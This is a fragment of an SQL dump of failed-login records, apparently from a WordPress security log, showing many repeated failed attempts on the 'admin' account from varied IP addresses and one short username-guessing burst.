(101916, 1498210402.259077, 1, 'loginFailValidUsername', 'admin', 1, 1575310877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101917, 1498210403.309237, 1, 'loginFailValidUsername', 'admin', 1, 1575310877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101918, 1498213191.405930, 1, 'loginFailValidUsername', 'admin', 1, 1730847688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101919, 1498213193.623996, 1, 'loginFailValidUsername', 'admin', 1, 1730847688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101920, 1498213672.828207, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101921, 1498222061.485177, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101922, 1498222250.303941, 1, 'loginFailValidUsername', 'admin', 1, 3398297938, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101923, 1498222251.510265, 1, 'loginFailValidUsername', 'admin', 1, 3398297938, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101924, 1498222733.101308, 1, 'loginFailValidUsername', 'admin', 1, 3206702193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101925, 1498222734.673055, 1, 'loginFailValidUsername', 'admin', 1, 3206702193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101926, 1498223131.238489, 1, 'loginFailValidUsername', 'admin', 1, 2835215073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101927, 1498223132.595282, 1, 'loginFailValidUsername', 'admin', 1, 2835215073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101928, 1498223336.840130, 1, 'loginFailValidUsername', 'admin', 1, 1979308825, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101929, 1498223338.559803, 1, 'loginFailValidUsername', 'admin', 1, 1979308825, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101930, 1498225428.130278, 1, 'loginFailValidUsername', 'admin', 1, 1676138367, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101931, 1498226729.333425, 1, 'loginFailValidUsername', 'admin', 1, 3188957179, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101932, 1498226730.767737, 1, 'loginFailValidUsername', 'admin', 1, 3188957179, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101933, 1498227075.963981, 1, 'loginFailValidUsername', 'admin', 1, 762659066, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101934, 1498227077.506026, 1, 'loginFailValidUsername', 'admin', 1, 762659066, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101935, 1498228492.175255, 1, 'loginFailValidUsername', 'admin', 1, 2867854843, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101936, 1498229445.469734, 1, 'loginFailValidUsername', 'admin', 1, 1081592037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101937, 1498229446.857670, 1, 'loginFailValidUsername', 'admin', 1, 1081592037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101938, 1498229898.660835, 1, 'loginFailValidUsername', 'admin', 1, 453318637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101939, 1498229900.006844, 1, 'loginFailValidUsername', 'admin', 1, 453318637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101940, 1498231769.918963, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101941, 1498235390.860230, 1, 'loginFailValidUsername', 'admin', 1, 632957447, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101942, 1498236291.492660, 1, 'loginFailValidUsername', 'admin', 1, 1475976132, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101943, 1498236292.881814, 1, 'loginFailValidUsername', 'admin', 1, 1475976132, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101944, 1498239938.367523, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101945, 1498240401.053352, 1, 'loginFailValidUsername', 'admin', 1, 1743905101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101946, 1498240402.329313, 1, 'loginFailValidUsername', 'admin', 1, 1743905101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101947, 1498244034.622348, 1, 'loginFailValidUsername', 'admin', 1, 3126355895, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101948, 1498244035.970476, 1, 'loginFailValidUsername', 'admin', 1, 3126355895, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101949, 1498246226.524945, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101950, 1498246659.412626, 1, 'loginFailValidUsername', 'admin', 1, 3315471986, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101951, 1498246662.629997, 1, 'loginFailValidUsername', 'admin', 1, 3315471986, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101952, 1498248890.523333, 1, 'loginFailValidUsername', 'admin', 1, 3154283770, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101953, 1498248891.514830, 1, 'loginFailValidUsername', 'admin', 1, 3154283770, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101954, 1498249729.661127, 1, 'loginFailValidUsername', 'admin', 1, 2006579831, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101955, 1498249732.290907, 1, 'loginFailValidUsername', 'admin', 1, 2006579831, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101956, 1498251993.931695, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101957, 1498252026.754476, 1, 'loginFailValidUsername', 'admin', 1, 1545909030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101958, 1498252027.750316, 1, 'loginFailValidUsername', 'admin', 1, 1545909030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101959, 1498253019.943293, 1, 'loginFailInvalidUsername', 'center', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101960, 1498253021.745035, 1, 'loginFailValidUsername', 'julie', 2, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101961, 1498253023.588730, 1, 'loginFailValidUsername', 'pablo', 3, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101962, 1498253025.565317, 1, 'loginFailInvalidUsername', 'vous', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101963, 1498253027.415768, 1, 'loginFailInvalidUsername', 'training', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101964, 1498253029.211513, 1, 'loginFailInvalidUsername', 'notre', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101965, 1498253031.003331, 1, 'loginFailInvalidUsername', 'pour', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101966, 1498253032.781346, 1, 'loginFailInvalidUsername', 'cross', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101967, 1498253034.593616, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101968, 1498253036.594254, 1, 'loginFailInvalidUsername', 'venez', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101969, 1498256590.335548, 1, 'loginFailValidUsername', 'admin', 1, 1309960562, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101970, 1498258050.314826, 1, 'loginFailValidUsername', 'admin', 1, 2410705134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101971, 1498258051.740961, 1, 'loginFailValidUsername', 'admin', 1, 2410705134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101972, 1498259040.350378, 1, 'loginFailValidUsername', 'admin', 1, 656526211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101973, 1498259041.689369, 1, 'loginFailValidUsername', 'admin', 1, 656526211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101974, 1498260017.314815, 1, 'loginFailValidUsername', 'admin', 1, 3574948740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101975, 1498260435.554246, 1, 'loginFailValidUsername', 'admin', 1, 2534459701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101976, 1498261888.526005, 1, 'loginFailValidUsername', 'admin', 1, 3218485542, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101977, 1498262960.617269, 1, 'loginFailValidUsername', 'admin', 1, 1570286770, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101978, 1498262961.606907, 1, 'loginFailValidUsername', 'admin', 1, 1570286770, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101979, 1498263354.679316, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101980, 1498265826.571528, 1, 'loginFailValidUsername', 'admin', 1, 3134007565, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101981, 1498265828.095373, 1, 'loginFailValidUsername', 'admin', 1, 3134007565, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101982, 1498267323.851200, 1, 'loginFailValidUsername', 'admin', 1, 3138834971, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101983, 1498267325.283500, 1, 'loginFailValidUsername', 'admin', 1, 3138834971, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101984, 1498269593.522963, 1, 'loginFailValidUsername', 'admin', 1, 1328892392, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101985, 1498269594.492180, 1, 'loginFailValidUsername', 'admin', 1, 1328892392, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101986, 1498269689.387079, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101987, 1498269877.879214, 1, 'loginFailValidUsername', 'admin', 1, 3583327640, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101988, 1498269878.847806, 1, 'loginFailValidUsername', 'admin', 1, 3583327640, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101989, 1498270726.609512, 1, 'loginFailValidUsername', 'admin', 1, 3203903519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101990, 1498270729.212302, 1, 'loginFailValidUsername', 'admin', 1, 3203903519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101991, 1498275601.688631, 1, 'loginFailValidUsername', 'admin', 1, 1315794184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101992, 1498275602.785281, 1, 'loginFailValidUsername', 'admin', 1, 1315794184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101993, 1498276821.316889, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101994, 1498284464.695669, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101995, 1498290579.926541, 1, 'loginFailValidUsername', 'admin', 1, 1768440932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101996, 1498290581.064732, 1, 'loginFailValidUsername', 'admin', 1, 1768440932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101997, 1498291727.531268, 1, 'loginFailValidUsername', 'admin', 1, 2835408180, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101998, 1498291728.956868, 1, 'loginFailValidUsername', 'admin', 1, 2835408180, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101999, 1498291985.772565, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102000, 1498292338.752552, 1, 'loginFailValidUsername', 'admin', 1, 2026148082, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102001, 1498292460.308797, 1, 'loginFailValidUsername', 'admin', 1, 2249451200, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102002, 1498292820.606162, 1, 'loginFailValidUsername', 'admin', 1, 1494341211, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102003, 1498292821.595296, 1, 'loginFailValidUsername', 'admin', 1, 976839691, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102004, 1498294007.765872, 1, 'loginFailValidUsername', 'admin', 1, 84727772, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102005, 1498294008.805611, 1, 'loginFailValidUsername', 'admin', 1, 84727772, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102006, 1498296514.215747, 1, 'loginFailValidUsername', 'admin', 1, 1542064231, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102007, 1498296515.281067, 1, 'loginFailValidUsername', 'admin', 1, 1542064231, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102008, 1498297348.993453, 1, 'loginFailValidUsername', 'admin', 1, 831589706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102009, 1498297350.992011, 1, 'loginFailValidUsername', 'admin', 1, 831589706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102010, 1498300517.052942, 1, 'loginFailValidUsername', 'admin', 1, 1951055877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102011, 1498300518.491393, 1, 'loginFailValidUsername', 'admin', 1, 1951055877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102012, 1498302909.498105, 1, 'loginFailValidUsername', 'admin', 1, 1976433579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102013, 1498302911.073190, 1, 'loginFailValidUsername', 'admin', 1, 1976433579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102014, 1498304584.920755, 1, 'loginFailValidUsername', 'admin', 1, 3154283770, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102015, 1498308291.031138, 1, 'loginFailValidUsername', 'admin', 1, 1549150117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102016, 1498308425.158480, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102017, 1498311118.809920, 1, 'loginFailValidUsername', 'admin', 1, 2058455615, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102018, 1498311120.152572, 1, 'loginFailValidUsername', 'admin', 1, 2058455615, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102019, 1498311525.104666, 1, 'loginFailValidUsername', 'admin', 1, 3541712849, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102020, 1498311526.824196, 1, 'loginFailValidUsername', 'admin', 1, 3541712849, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102021, 1498312463.978098, 1, 'loginFailValidUsername', 'admin', 1, 1380923486, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102022, 1498312465.404055, 1, 'loginFailValidUsername', 'admin', 1, 1380923486, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102023, 1498312757.164248, 1, 'loginFailValidUsername', 'admin', 1, 834357323, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102024, 1498312759.163580, 1, 'loginFailValidUsername', 'admin', 1, 834357323, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102025, 1498316522.279867, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102026, 1498319743.320989, 1, 'loginFailValidUsername', 'admin', 1, 1379316302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102027, 1498319744.575465, 1, 'loginFailValidUsername', 'admin', 1, 1379316302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102028, 1498320147.809317, 1, 'loginFailValidUsername', 'admin', 1, 1295063143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102029, 1498320148.941326, 1, 'loginFailValidUsername', 'admin', 1, 1295063143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102030, 1498322693.758970, 1, 'loginFailValidUsername', 'admin', 1, 3017243680, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102031, 1498322695.141285, 1, 'loginFailValidUsername', 'admin', 1, 3017243680, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102032, 1498324353.487984, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102033, 1498330396.034184, 1, 'loginFailValidUsername', 'admin', 1, 3201326218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102034, 1498330397.488116, 1, 'loginFailValidUsername', 'admin', 1, 3201326218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102035, 1498331015.108793, 1, 'loginFailValidUsername', 'admin', 1, 1581122265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102036, 1498331016.056877, 1, 'loginFailValidUsername', 'admin', 1, 1581122265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102037, 1498331037.395720, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102038, 1498331326.874797, 1, 'loginFailValidUsername', 'admin', 1, 1840358767, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102039, 1498331328.005355, 1, 'loginFailValidUsername', 'admin', 1, 1840358767, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102040, 1498332051.223232, 1, 'loginFailValidUsername', 'admin', 1, 1314397598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102041, 1498332052.248106, 1, 'loginFailValidUsername', 'admin', 1, 1314397598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102042, 1498332828.709031, 1, 'loginFailValidUsername', 'admin', 1, 835613621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102043, 1498332829.915360, 1, 'loginFailValidUsername', 'admin', 1, 835613621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102044, 1498333075.844032, 1, 'loginFailValidUsername', 'admin', 1, 1417279797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102045, 1498333076.942887, 1, 'loginFailValidUsername', 'admin', 1, 1417279797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102046, 1498336764.927159, 1, 'loginFailValidUsername', 'admin', 1, 2537022330, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102047, 1498336966.597012, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102048, 1498339390.722811, 1, 'loginFailValidUsername', 'admin', 1, 3109639452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102049, 1498339393.285019, 1, 'loginFailValidUsername', 'admin', 1, 3109639452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102050, 1498340142.400456, 1, 'loginFailValidUsername', 'admin', 1, 3174000914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102051, 1498340143.955250, 1, 'loginFailValidUsername', 'admin', 1, 3174000914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102052, 1498340550.113277, 1, 'loginFailValidUsername', 'admin', 1, 3185558189, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102053, 1498342801.874577, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102054, 1498348106.217769, 1, 'loginFailValidUsername', 'admin', 1, 2390016735, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102055, 1498348801.838211, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102056, 1498350094.075770, 1, 'loginFailValidUsername', 'admin', 1, 1354011537, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102057, 1498350919.946295, 1, 'loginFailValidUsername', 'admin', 1, 1581398262, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102058, 1498355372.980326, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102059, 1498358084.228263, 1, 'loginFailValidUsername', 'admin', 1, 1391229745, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102060, 1498358085.384863, 1, 'loginFailValidUsername', 'admin', 1, 1391229745, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102061, 1498362315.088163, 1, 'loginFailValidUsername', 'admin', 1, 830516292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102062, 1498362623.945221, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102063, 1498364348.916096, 1, 'loginFailValidUsername', 'admin', 1, 3192869794, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102064, 1498364350.269135, 1, 'loginFailValidUsername', 'admin', 1, 3192869794, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102065, 1498368497.082926, 1, 'loginFailValidUsername', 'admin', 1, 1092327198, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
